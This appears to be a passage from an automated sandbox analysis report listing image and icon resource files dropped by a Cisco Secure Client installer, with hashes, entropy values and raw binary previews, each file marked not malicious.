                                                                                                                                      Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.tT..7>rk.....I...R.....6D../...T@..._.A[..$rkA.D..U0......W.EI..(...^.TC.TX>...eD......>{.>g...d~k.Jf....;....G.BB.<y..#N.6.i}......#.~......G.~......s..~...5..V...N......'.=..$.........K..a{.c.........:...3.....:.L...KWu.{.._..../<.Z...n.y..../.e{.i.3.......[.O`|..h.+../........M#._....s..G.3hO....j.._&..?...s=.<._\~I/..9....W..I.....u.tq..}..7.G;....h........f.G.v.h<....c...7.0.1....d[...^.......D"1....[.ilC..=@.6.U.O0.......P.......D.t..K..}.6M._*.....6._:h.'.Ix.htP..l.N.4.........$.m.......:........+..o<.../Ly]..p.....+...y.._.........t..........7..g...D..Y..A.........n.....9.....D."j.9....>]p.ly...........N.<....IaT..N'S..'..4.Nd.ntN........;..<d;..^..:...0...m.?).....Q..X.`).......%....!...........'..'...M2M.?..D..3{_[....jdpY.tW.i.....5Wep......Jj7....IJ....g.?M..).\}Bkc]....~u...~...w......!.x..w.......;)~NL...L.;wN............\j.[.N.Dt...EB.c:.....b..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-TKM79.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):4.010961844615086
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:+9/hYGSEklnePwwDIr4LcARtTmOj/FrzFkT7goo:+9/CGShEPJcX87v
                                                                                                                                      MD5:393317DEF43F554C69A8ED63065E5BBE
                                                                                                                                      SHA1:09185B8B3C21C5CFB6661958665B6D997BF64E6F
                                                                                                                                      SHA-256:92ACFDA492B05FAA52BD32E9581F028BEE55F1C5AF617ACD8EE9E6985C9D1CBD
                                                                                                                                      SHA-512:9C7B0D37DA9080F27F0116F0C45AA5CD2D9480955433D60CCEE1555C0D930081655705C65565C7C18B766458530FA5B8DD641E7D2F8776BBB8650B7D3A95351C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .....&......... .h.......(... ...@..... ........................................................................@................................IA.P..s...s...s...s...s...s...s@............................................................................................b[....y.&...,...0 ..0 ..,...&.....y...s...s......................................................xh.cB+.M'..M'..M'..M'..J&..$.`.".../...0 ..0 ..0 ..0 ..0 ..0 ../...".....s...s.........................................z]J.M'..M'..M'..M'..z]J.z]J.z]J.+.S."...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..".....s........................0..........w.M'..M'..X5...xh.......................y./...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ../.....y...s@........................z]J.M'..M'...xh.........................qj..&...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..&.....s.....................z]J.M'..X5.................................8/..,...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..,.....s...................w.M'..X5

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-TQ719.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):10239
                                                                                                                                      Entropy (8bit):7.950564187811269
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:uTeKIu+Nxu1/eEefaoIgGSw78i5GJssnezz3Gu5cMrvF6AO:uTeg+NkdeCodGSiV3dcI96AO
                                                                                                                                      MD5:7DADB01AC22B7AB6F313726AD5977675
                                                                                                                                      SHA1:274554CDEB3971D3A9250AA0A7597F8B41D17000
                                                                                                                                      SHA-256:EBBA9313774314E18ABB4F4342B1C0C93DF22DD45146C6E84A08EB39BD419825
                                                                                                                                      SHA-512:C77FA7F8791A4852DBA2C9402D705E6C4CDB92DAAF71CD5F46EA8AD6EA35E41D4CFF42296C2F08133A82AE1F31DCA05C61B29AC291F85BBE4C7FDF088A4F0866
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx....U.._l.eK.ImJ\.7`vV...R..t..P3.L...N.DZ..R........!8...`..$.dqj..j..-.a.C.....+...WB)S.tc..N.j..xOs.>...|....UT7....s.......c.!.Q_j.!.......rw..5.....E}.q...R..V.N'Na..@...-...y.`......h..)LS.........J!.....V<(Z9...8E:...-.B.'z.?..1.>X../.k.W(Z9C:.y.=.0.s._.K..#...-........_.0..1...P..C.{-R.Z.~>j.O.X..1...@.r.YJ.....Q.._/......7M..o.4|....J&.t.w. .9sV.|..kz^?5.....K.....D......Q.fd..VFIJ. >..;..".$EG'>I...m..=....E...<...?..e..V..S.|1.3s........K@. ^.w...../`..Bf..V......\....f.w.............).'..!G!`...8......r..!)X5..l.....N%.>.T.x.mq..).E$bp\.....>&.E+A*\..Z.?8.E.g.93.....v.T...I...XGW.'j5rL...WBP..@.)l.....=..=......{q...|.Gtv.Vkr..k7s_.C.............i.l....B.#./.*`.....1.(Z1 .jK...tT....._.%.D....W.P.".....z..X.^..7:.z..W..UB...V.."V~..."..!.s/..9.*.G.W.P.j.Z...B...5K..9.\.........}.P...b50T...j.f.U1.....s..}.._.J<^.s...V.d.U..,k VpU..............M..I.u.......%

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-UHFUG.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5558
                                                                                                                                      Entropy (8bit):4.450533821817726
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:vcn7ngbW2IU8R9Lq+LhfSnuX31xEqxpkg:E74IU8R9LqMTFxz
                                                                                                                                      MD5:EAF0F00DA8BB1D384B8A5BB3B82D0A54
                                                                                                                                      SHA1:2E7021D20D962F4568A51757B2D9B7408624740E
                                                                                                                                      SHA-256:86D5102E01D6D29D5AEE6E87E827B8C624D7B552035C9AFDB0BE2B120E4A553F
                                                                                                                                      SHA-512:57358DEA1B8A75A8FEEE29F9D83931D65672B228B93CE6C9CFEEBA3C77FD9FDB8D7B7D4A1F3188D8CBC2FEBF8B427F574791E6210580499788FF101641C01854
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .(...&......... .h...N...(... ...@..... ........................................................................ ...`...................................................................................................................p.........................................................~...~...}...}...}....0........................................`................z]J.M'..'....hm.)...................................................................................................z]J.M'..M'..M'..M'..'...%x}.+...............................................................................................M'..M'..M'...kY..............x}.....!....................................................................................xh.M'..M'..z]J.....................8y}.4...#................................................................................xh.M'..M'..............................Az~.=...%......................................................................p........M'..M'

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-UHLAU.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1856
                                                                                                                                      Entropy (8bit):7.845521158056495
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:M5K2A2T3d0z5uOpdNSaQfbDS3YsPWaU3SjmUjm42rh:Mg2A9z5Fp1W3otPW5p
                                                                                                                                      MD5:AFAF04A11862845AFC31D64F7762D28E
                                                                                                                                      SHA1:C5E99C3DC321086738CB7BCF13EFF55EBDF1D3CF
                                                                                                                                      SHA-256:6797601AA69F2B489ADAB85A6DA73E78D4E041D24598BC726A3E837D2BE2D75E
                                                                                                                                      SHA-512:3D463D3EA19E87E8B592974BF4B69F4F6F5DE08975BB04AB0C180AE7CC49C9866E7B40F2D5890E50E7BF0FE2F8830125335FECB7C4FED8F2AF6045F8E66E18B4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..r.F...I.t..X..*.&T..P.JT.*...d.)0..@.....I.T...~..L.9...".....s.7..{D..|..?w.D".H$..D"......$...h..{*...#..C..6dDt...0..]..6.v.<.,.....8E.k...$.h..j)..s...C.XE.r]5\..E|..].bDY.....Rl...\X..p]WMt.,..Q..O...Oe...........\..b...1.|BY.f.r.d.5.]..#e..h.u]5.y%...DtGD....q_Z.m.Vi.+*......5....{G.^~'..-.8..Xx...xK.-...[.a...2_wa...%....E..!...m1XKi.d...r...o.v.>.SIeq..)m....AH.....^.F.?.....w...?.s.G.......^r...G.(.viDh.X....O.>..+..5@....9....+..]W......m.emb!...../....W..WS?8d.E.<.Q...S...!.!#.R.u5........4..Qn.F*.G[.PYQY@...D........|..,.*.am....h..k..e"0'....IQJ..@N..7...&^.Y.S..........Q[o..../|j":.xnb._q...{^c'..Lz..!(.t..t..k.X...n..+................xLkzz....W..RVr.....Q.wy.T.........]... $n)d..#..........%..}.Hx..q..,T7..F..v....=7p..$(....].S.....D......=...m.B.......ML ..%...X...U.*...e..H..EM.?......].....D...o.).M...W.P.h......=..#..4...Z..0Yn.E..?...K ;K.$..n..Zq-A..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-UTSJ7.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):26674
                                                                                                                                      Entropy (8bit):7.935979285003627
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:YFyemvD4Gm3D6kkgmo+C24RkZErZWiTVCbFk:YryD4G+Dcgmo+C9kZsZWpFk
                                                                                                                                      MD5:B1655EC01B232A1A42E43F950321285A
                                                                                                                                      SHA1:F34C1F228C66BF4ED1B0E9901D3284EBD7A01600
                                                                                                                                      SHA-256:9E2447F1B7B4A3404C8D3588DAB59CF51635049BE4F1FC0D1BDEE77DEFFC5B47
                                                                                                                                      SHA-512:BCC1BC2AE795109EF83422613D9B0D9FF23EA81136479748FFA7CD7FC03D527B4744833728637F7892B5F60DD476F1F32122AECCCC26DB2D6092CD2346A750BA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx..Oh%G...G........4..TSG.nO....j..CI.s.7%...fa..ofQ*...x;...<^/,y1.a.R...RA/.f!..)...R....\K..]......'Od..........d.tN.<...../.O.9>.............}.P8e.M.:8.'#........z.Z;.)K.,--%..'.?a..GB...[1r..I\2...4?..SKN|`. ..E..n..hz..mll.z".KhG\>.i.2....;.....|\.ywww.......a..{2*..Io~.UO..t*...'ckk....~.....zB*......I.R.T9!.OF...|...e(z#.N....o.P.+eOH...]..~..@..!...=*....'>...+O\.u..Z.yo...{.......2ieX9..(.Br):.k!..I.c.}S.'cccc..F.......0q"l...k....ve.>...p.coRw2r.D.[...}....h>.Q.*B<.......y...{&B.<...{...9.e7`.......w...*\.Mt..EU...h.].....r.G..;y..`.d..C6.Y.z#.f.r2.y.5.W.<.#!..!..[.5.yp;...OFL.Brv.V.uoe..O....aV.2.p2....d.t.C..'..e...Q7-.g...._...3.N<....}D:.`3.....n.^.0..X.VF..f.'.u...W...p}.(Y.#......M?.......r4.|...*...@).GGz/`...U....3............F.C...[.5...;..kv.[...+k3$......N...c......j.B(..Z...k....&...8.._..E..M..(I..u..Td.....R....C.......b....E/X;....#..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-UVJCF.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):9736
                                                                                                                                      Entropy (8bit):7.95835565935799
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:uGw9FbNic2CTLMZgb0OeuEqR0+zipNb19+MUs2b4uLbFv7MLlELHz5FijB:uZ95jOAdE+0+mpNB9dObfR4LiLHz5QjB
                                                                                                                                      MD5:64C1592AB32B98889AFDB7F216B3A535
                                                                                                                                      SHA1:9DA1BF63D0E9CCF65BA0C72E615099AD30DDB2EB
                                                                                                                                      SHA-256:B649B2B24F635758C6B424EBADA07097ABB56CE73E46F056268004D79575AA8F
                                                                                                                                      SHA-512:CA8376AEB64FE49CE253BEE7F949AEBFDB6C1EAD6270C739B09751CEEA313407F7AABBA7388E4ABFA53A48A322D827EF6D4FF1D458C3FB815239407646D53C84
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx......}....j'.b.*A...H.8B.p....IXM.Q....db..D...!.*#aI..J.h..M"k?...k..t.......+!j...T7.N.y9.r........o..e......{.....?...B..\i...... ........T...u ~.h...J.4..%"..k.^...O.....".....v...+7...........M....J.z....E..(...0M+.S.R"._.2.Y..h...J.+J.+.*.@..-5....T.......E+.4WZG)q.H...k.]..|C...*,.P.O9.72{.......]y.....}J.:Dd;C.|@..8J.....rEh.......c..|?......A.D}....J.[...<E.C)y.....J.A.. i...&8.3y...t.x.9bx .6......W..&......zV^9......e..VFPA..$..b...4q.L...&..R.....7.....aK..A...........6%V....=A.f.2$Ve.ue={.8....#.....7..V.P..FE9..#> ..OuDj...ME......*....+](Z).\i]...H#....>E....N**pb..>+;....X.....z6...E+aT..L.U.."5..YtS...l[....'..u..qsV.k..h%DM..(l...u.5.e.YN.H.'&.C......Qbu.....EA.....l......!.Um......Q....n.b.*.l{t.<.+l..B{.W.P.".E..V,..._.@....... X.Y6F......}i..j.rUY.@'v \k7<.&.b....V..+....-Vn..g..X.d\.ak..K...U.@...ZToS...........,8np.....l..G.P.|.r.MA.B)V..."....

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-V8IN9.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):11585
                                                                                                                                      Entropy (8bit):7.961332304899258
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:uoknxnFWLkyZS1HwgrTfSTVQV1r+2HPOSm9HRNxe6S1ipOvyYh95kRwjtbul4Ljh:uo4xAoKoHuVuHPOSmdfxy1ipwN5bjtbB
                                                                                                                                      MD5:FAA694AA17D61EAC6803E15397AE2C15
                                                                                                                                      SHA1:D3FBA06AA2794D460DEF2997E84EC7CBE49A83AB
                                                                                                                                      SHA-256:9AC4F60BF1A10CD08529427AAA1C419F5C4C1412D23EE5764B9EDACC3558A980
                                                                                                                                      SHA-512:5B2586AC90E5366C236AE02181172842CFDC311495157477ACB388A50CA56B5FB1EE532B753323566937012A54027DC53DE803DB4178F6F85618ADA4B015308C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx....UU..7bJ_..I&.:p..#.D.2...vOU...y......I.E0...LK ...T...E_.o.H^.......QG..Hy%v.=...;....wj..Ru.>g....}._R..U..s....^{.!.....F.!&..7~.ip....G.......n..$..-.PS..%..~.)..._i.%..A.....[.<.W.P..D.S.0]+...)U..A.>..F.V (Z.RS.s.i.tMy.'S\1;(.C..}...(Z.PS.s..+Pi.tY..B....;...H..h... R..w.]T\t.p."..N,.P.rDM..Q:..8...|K..........._.G..d.Dk.D...'+.E.P.2.L.7..\..1|..8~...&.0...L.a..1......s..'N.......;.O..L|}.4E.uam.1..Q(Z.c.P5&qt...........n...p~.*'O.&z........q~..A..b..,.P.2...\...QA...6.qM.'.(.)[.........z.X.B....C.l@."2..P.9*....$&...n.@..Bv....#b..W..n..9&..E.....!._Q}...R..b....G.g........w\..8.W....Wz.;.~~....2W.$.*....=..).U..TT Z..>.;....q.".hf.+.(Z.#C..B.%a...a.4Q?g*.T..l.;GD{...0..u.......r...!`.P.Y.t..A..H......h.LT...B........v)`.BH.W.P.b".X!/.p.b..;... .....hm..6.O...VD...\.......PB..............M..!...tU9.u_/..'L.....]'.A.2$.j .j..{....7..i.kaBG.6...e@M..IY..x..+V.....@..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-VMN9S.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2274
                                                                                                                                      Entropy (8bit):7.88487369762579
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ANENb8K8isarhoHup4l7Hn5MPuvW5LApZJ+WoXY:Bbx3rGHupubC6NpzSXY
                                                                                                                                      MD5:02AA7BFBC5519A9410E0D27732A6A163
                                                                                                                                      SHA1:9DDE546C6090CA4BD8BE58F8625A6AE25D440E6E
                                                                                                                                      SHA-256:B08A8AE17D62E9CF9D6E91E59955AF91E1B126FD82BC1071BDAFEE8AB6818253
                                                                                                                                      SHA-512:323777E1ABC44F643AD6AE581970D551D6BB94DF485377E91DB411ED8B839C47F8490002DF9756AD340BC19D8676050A620A1008F211B3AC32C39BE37CD35093
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx...LUe....]i...%L.......^....#.J[6...[.Q.....2.0.p...sT...o.c.n..dE[N/E.9..H..k.....{..s.....wc.{.=?..}..}..}.3....jK#.d"......&"......ug.|b......".&.,"J..[.x..&.J$s....]=t..*........TMDU.G.5=._.@&...........c[|V..v...|3..3.......,...`vp0.@.H...e.`V..`]..g.^sN........ o0..-.gQFz........J..+j.*h@&...T@D...k.zwl1Z.t.......r.U.. n5..5p..{..f1r.E.=P"\..6.jM..2Ym.....u.V..=[)&:*."i...^.{.(U.:C.V..uMjo........N.DG..9.......?.4,....)cy*..H5?]..s..5.lm.w:TAR...)M...YV.GK...<.....|.".p.%.....f.u5............Rr..y.}..DL*Sr.".z...w....n..d...8B.@...xmU.4+...J.n............(KQ~...,.L....>..LV..9....[..../.G.T..(..>4(7...xGw........h.....X.....{..V-@B.../..y..1..W.d. nn...&....~...*S`....k...@k{.w.dP-.n....Z.(...=.:...N..#\......-~......0..;...K. .'....;..|J.n.d.t...A_O)d..g r...w-...e........@5.d.v...........e.y-....3\.......H..[.g.roI.=.(B...\.d.....jh..K..S.].......Xf...jC....ol...2

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-VNE0H.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):28939
                                                                                                                                      Entropy (8bit):7.960017526195935
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:OkJC2FKvbdu0G3091/3+WVlQkJyE3MNLc37Wr65:FCQmc0390W0kT8ll8
                                                                                                                                      MD5:B52EAA7318111371B2B8EF3425AD4405
                                                                                                                                      SHA1:DB16F9570B55F8045FE8354ACC853655791557AA
                                                                                                                                      SHA-256:C33C036B94E3BD83D393E552CE87784BA9F74D2B8563162024DAF7ED05E7EF6D
                                                                                                                                      SHA-512:AA98F3130A76BCD5FAF093886472F1A937E93AD0A8E83C00F9675C14C7AFC5DF903C52DE64FBAD6012F5DF54A1DB56759481BA8516C0DB0A851B6BE87FD13DFF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx..Mh]W.........CH..#...5.R.R..h$...'e.Cj.T.g....G...Z..v.aB..w..K.I..E.).....d..."]g...P.l.u..>{.?....@..u.>.......g=.....|.:D..~.........|(...q[.g.d.......~..9r.w...'...pnn.P..D$.xx(?..K"..r..9.I.....L.t.9.A\B.D.....^&...e.'.._Bk..M....$|....?....k=...:...N..N..{2*..a/~.UO..t*...'cuu....~.....zB*......IHS.T9!......|.. q.?}......].M,u.|i.90.<.s;y.Q.'..#..FH..3tP.:.i.]6...a.I0'.J...Rt2.!..I.c.}Q.'cyy.R.'uF...j..Sxy.u..}F..{D..H2G...1.`.R.......:..g.}D.Y....y..O=....7|`..].Eg..4.&.....[mzd.9.e......{.}.;.e'`u.sB..M...;#}.I.%R......Dd=.z..#.Q...;..j.E...;...o...b.D.p.v..I.L.\"i.\2.GD."G..ti....ui..W.........p.....sS+j...A..........]/F...ybst...4}!.....d.i.....,.M.Y..../.v.......Q...He....DM.;V.&:^......D.ka.l....^.....{...L......F........=...yB..U.#.QwD.<!....5.ZO...0yB^.........K#L...^.]....(.R.X.d.+.'y?..d."T:OH..s...J?{E|.....;....)....o.=.:+ZUp..H{{{......F.;[.8...H......

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-VQCM8.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 375 x 23, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):700
                                                                                                                                      Entropy (8bit):6.305816801627044
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7B0J+UJbp92cDPuY1qHlnv/pebLaeb9Lf43DQ6TjpuIXG13DQ6i5t2c:0erLYWuqylnv/pe3aO9KDUIXO3D+/
                                                                                                                                      MD5:894AB8F4298F2238292E31BAB5CCAB10
                                                                                                                                      SHA1:FCFC29B4E5BAC3C59EDA1F8837087E768F7B0A7B
                                                                                                                                      SHA-256:7C8B5EC8C7DE5405AAEE5B1E92C605020424AED8AF830C2429ED47883561A39D
                                                                                                                                      SHA-512:B7F06E961C2C2BAC0EFC5633E213D90E3206093593988BD04CE84DA13B1D1B4F0B83DEB77FF247E6681A645004FD37C2866FF83EB7A6A5E3E581B0868AB58C3E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...w..........C......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...YiTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.4.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Orientation>1</tiff:Orientation>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>.L.'Y....IDATx...... ..A.............. @.@J...C...._..+.......=.T... `.u....A...|.H...0.:@.....q.>U$....w. @.@P....*........ @ (`.O......]... ..0....D.............SE"@..q........{.". @..........=.T... `.u....A...|.H...0.:@............X~....IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-VSCA8.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):75452
                                                                                                                                      Entropy (8bit):6.447447333863436
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:i6ORO3YabolewEiM0aJqCrvbURQDEb6b/4:ik3dolewM0agCrImD3w
                                                                                                                                      MD5:9C6F8BF269230734B04A82F610B9B912
                                                                                                                                      SHA1:2B81B2C45C94CA29330ED0223F21928BEAA66A3D
                                                                                                                                      SHA-256:3A5C49B91E68BE97E158E7A35C54996C45F1E9E8432927AF476D5F85BCF7B67E
                                                                                                                                      SHA-512:4F24CAD91616F50E1C28E0D44C66B0F6E6C89F38E9A07B81C43810862F3E76E77D897D6B06BB7CD2FEFDFC1E01011FA1CEBCDF2E6E53F347E98B9CEF7FCBF1C9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............k.....pHYs...#...#.x.?v.. .IDATx.....H.(Z.1.<....C{@{..\..-...X.....<.....,5.!)..2S.x(.^k.LS.P....4..................................................................................................................%Y.]"".......c.K. ..X.rH'./.5.#...]..........O.S...2..s:...}P.%B. ....Y.P....@.....0.......,.(.da@. ....Y.P....@.....0.......,.(.da@. ..JG.W....w.$...^.o|.[..\.G..=.........k....#..SJ...nm..h..O7%c.2....)....hh.;.Z...e^...c.a.q.,....{.oe...Q..a5g..^.6e^...#B.k..a/%..{aL....0.......,.(.da@. ....Y.P....@.....0.....e..o.{..+".L...wg..~i..PN0......-..z.Z.Yg)..1........m..7...r.Gw..7.$..N.0.*.sW......d@...4..i...P.@D|;5?t0.+........P....@.....0.......,.(.da@. ....Y.P....@.....0..../...7.....kW...i..T...6..F..A#+..s.......(.`....V.-*Z.kCI..>.PN.....eE;.?ou.N...}.k7..\........R.X...w.....}_...#.|..s^....&..z....Z.....8.d)`..9kY.. ....Y.P....@.....0.......,.(..9.n.np....y{W..\.....N0p.j .4.'..&................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\l2_logo.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):10239
                                                                                                                                      Entropy (8bit):7.950564187811269
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:uTeKIu+Nxu1/eEefaoIgGSw78i5GJssnezz3Gu5cMrvF6AO:uTeg+NkdeCodGSiV3dcI96AO
                                                                                                                                      MD5:7DADB01AC22B7AB6F313726AD5977675
                                                                                                                                      SHA1:274554CDEB3971D3A9250AA0A7597F8B41D17000
                                                                                                                                      SHA-256:EBBA9313774314E18ABB4F4342B1C0C93DF22DD45146C6E84A08EB39BD419825
                                                                                                                                      SHA-512:C77FA7F8791A4852DBA2C9402D705E6C4CDB92DAAF71CD5F46EA8AD6EA35E41D4CFF42296C2F08133A82AE1F31DCA05C61B29AC291F85BBE4C7FDF088A4F0866
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx....U.._l.eK.ImJ\.7`vV...R..t..P3.L...N.DZ..R........!8...`..$.dqj..j..-.a.C.....+...WB)S.tc..N.j..xOs.>...|....UT7....s.......c.!.Q_j.!.......rw..5.....E}.q...R..V.N'Na..@...-...y.`......h..)LS.........J!.....V<(Z9...8E:...-.B.'z.?..1.>X../.k.W(Z9C:.y.=.0.s._.K..#...-........_.0..1...P..C.{-R.Z.~>j.O.X..1...@.r.YJ.....Q.._/......7M..o.4|....J&.t.w. .9sV.|..kz^?5.....K.....D......Q.fd..VFIJ. >..;..".$EG'>I...m..=....E...<...?..e..V..S.|1.3s........K@. ^.w...../`..Bf..V......\....f.w.............).'..!G!`...8......r..!)X5..l.....N%.>.T.x.mq..).E$bp\.....>&.E+A*\..Z.?8.E.g.93.....v.T...I...XGW.'j5rL...WBP..@.)l.....=..=......{q...|.Gtv.Vkr..k7s_.C.............i.l....B.#./.*`.....1.(Z1 .jK...tT....._.%.D....W.P.".....z..X.^..7:.z..W..UB...V.."V~..."..!.s/..9.*.G.W.P.j.Z...B...5K..9.\.........}.P...b50T...j.f.U1.....s..}.._.J<^.s...V.d.U..,k VpU..............M..I.u.......%

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\l2_logo_72.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2274
                                                                                                                                      Entropy (8bit):7.88487369762579
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ANENb8K8isarhoHup4l7Hn5MPuvW5LApZJ+WoXY:Bbx3rGHupubC6NpzSXY
                                                                                                                                      MD5:02AA7BFBC5519A9410E0D27732A6A163
                                                                                                                                      SHA1:9DDE546C6090CA4BD8BE58F8625A6AE25D440E6E
                                                                                                                                      SHA-256:B08A8AE17D62E9CF9D6E91E59955AF91E1B126FD82BC1071BDAFEE8AB6818253
                                                                                                                                      SHA-512:323777E1ABC44F643AD6AE581970D551D6BB94DF485377E91DB411ED8B839C47F8490002DF9756AD340BC19D8676050A620A1008F211B3AC32C39BE37CD35093
                                                                                                                                      Malicious:false
